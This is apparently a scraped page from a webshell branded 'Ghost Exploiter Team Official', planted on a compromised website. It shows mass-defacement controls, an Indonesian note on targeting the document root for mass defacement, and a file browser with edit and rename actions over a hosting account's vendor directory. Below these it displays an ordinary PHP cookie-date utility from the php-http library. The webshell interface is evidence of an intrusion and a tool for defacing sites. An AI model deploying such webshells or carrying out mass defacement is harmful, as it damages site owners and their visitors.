webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
php-http
/
message
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Authentication
--
ren
Builder
--
ren
Decorator
--
ren
Encoding
--
ren
Exception
--
ren
Formatter
--
ren
MessageFactory
--
ren
RequestMatcher
--
ren
Stream
--
ren
StreamFactory
--
ren
UriFactory
--
ren
Authentication.php
0.67KB
edt
ren
Cookie.php
10.983KB
edt
ren
CookieJar.php
4.369KB
edt
ren
CookieUtil.php
1.381KB
edt
ren
Exception.php
0.129KB
edt
ren
Formatter.php
0.988KB
edt
ren
RequestMatcher.php
0.657KB
edt
ren
filters.php
0.174KB
edt
ren
<?php namespace Http\Message; use Http\Message\Exception\UnexpectedValueException; final class CookieUtil { /** * Handles dates as defined by RFC 2616 section 3.3.1, and also some other * non-standard, but common formats. * * @var array */ private static $dateFormats = [ 'D, d M y H:i:s T', 'D, d M Y H:i:s T', 'D, d-M-y H:i:s T', 'D, d-M-Y H:i:s T', 'D, d-m-y H:i:s T', 'D, d-m-Y H:i:s T', 'D M j G:i:s Y', 'D M d H:i:s Y T', ]; /** * @see https://github.com/symfony/symfony/blob/master/src/Symfony/Component/BrowserKit/Cookie.php * * @param string $dateValue * * @return \DateTime * * @throws UnexpectedValueException if we cannot parse the cookie date string */ public static function parseDate($dateValue) { foreach (self::$dateFormats as $dateFormat) { if (false !== $date = \DateTime::createFromFormat($dateFormat, $dateValue, new \DateTimeZone('GMT'))) { return $date; } } // attempt a fallback for unusual formatting if (false !== $date = date_create($dateValue, new \DateTimeZone('GMT'))) { return $date; } throw new UnexpectedValueException(sprintf( 'Unparseable cookie date string "%s"', $dateValue )); } }